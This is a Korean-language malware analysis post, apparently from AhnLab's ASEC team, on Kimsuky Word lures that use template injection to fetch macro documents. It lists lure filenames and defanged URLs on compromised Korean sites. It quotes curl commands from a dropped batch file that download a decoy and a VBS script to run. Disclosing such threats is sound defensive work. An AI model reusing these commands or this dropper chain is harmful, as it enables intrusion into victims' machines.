Posted By ye_eun , 2023년 2월 3일

정상 문서로 위장한 악성코드(kimsuky)

ASEC 분석팀은 최근 <원고 청탁서로 위장한 악성코드 (안보 분야 종사자 대상)>에서 소개한 악성코드가 안보 분야 뿐만 아니라 방송 및 일반 기업들을 타겟으로 유포 중임을 확인하였다. 해당 악성 문서들은 모두 위 블로그 글에서 소개한 악성코드와 동일하게 템플릿 인젝션(Template Injection) 기법을 사용하고 있으며 악성 워드 매크로 문서를 다운로드 받아 실행한다. 확인된 유포 파일명은 다음과 같다.

[kbs 일요진단]질문지.docx
임** 자기소개서.docx
app-planning – copy.docx

\word\_rels\settings.xml.rels 에서 확인되는 External URL

공격자는 악성 매크로 코드가 실행될 수 있도록 매크로 실행을 유도하는 이미지를 사용하였다. 해당 이미지는 과거부터 꾸준히 사용하고 있으며 모두 동일한 공격자로 추정된다.

공격자 메일에 회신한 경우에 외부 링크로 제공되는 워드문서 (Kimsuky) – ASEC BLOG

ASEC 분석팀은 대북 관련 내용의 악성 워드 문서가 꾸준히 유포되고 있음을 확인하였다. 확인된 워드 문서는 안랩 TIP에 공개된 “2021년 Kimsuky 공격 워드(word) 문서 사례 총 정리 분석 보고서” 및 ‘외교/안보 관련 내용의 워드문서 유포 중’ 에서 공유한 워드 문서 유형과 더불어 mshta를 이용하는 유형이 확인되었다. 악성 워드 문서는 다음과 같이 다양한 파일명으로 유포되고 있다. 김** 이력서(한미**협회,220711).doc 양**_**재단 중간보고(220716).doc 자문 요청서.doc 유형 1 자문 요청…

추가 확인된 악성 워드 매크로 문서 다운로드 URL은 다음과 같다.

hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload2/init.dotm
hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/init.dotm
hxxp://jooshineng[.]com/gnuboard4/adm/img/ghp/up/state.dotm
hxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm
hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/init.dotm

다운로드 받은 문서 파일에 포함된 악성 매크로가 실행되면 curl 명령어가 포함된 version.bat 파일을 생성 및 실행한다. 배치 파일에는 정상 문서와 추가 악성 스크립트를 다운로드 및 실행하는 코드가 존재한다. 사용된 curl 명령어는 다음과 같다.

curl -o “”” & fname & “”” hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/state.docx
curl -o %temp%\temp.vbs hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60

확인된 정상 문서는 다음과 같이 자기소개서, 어플 제안서 등으로 위장하였다.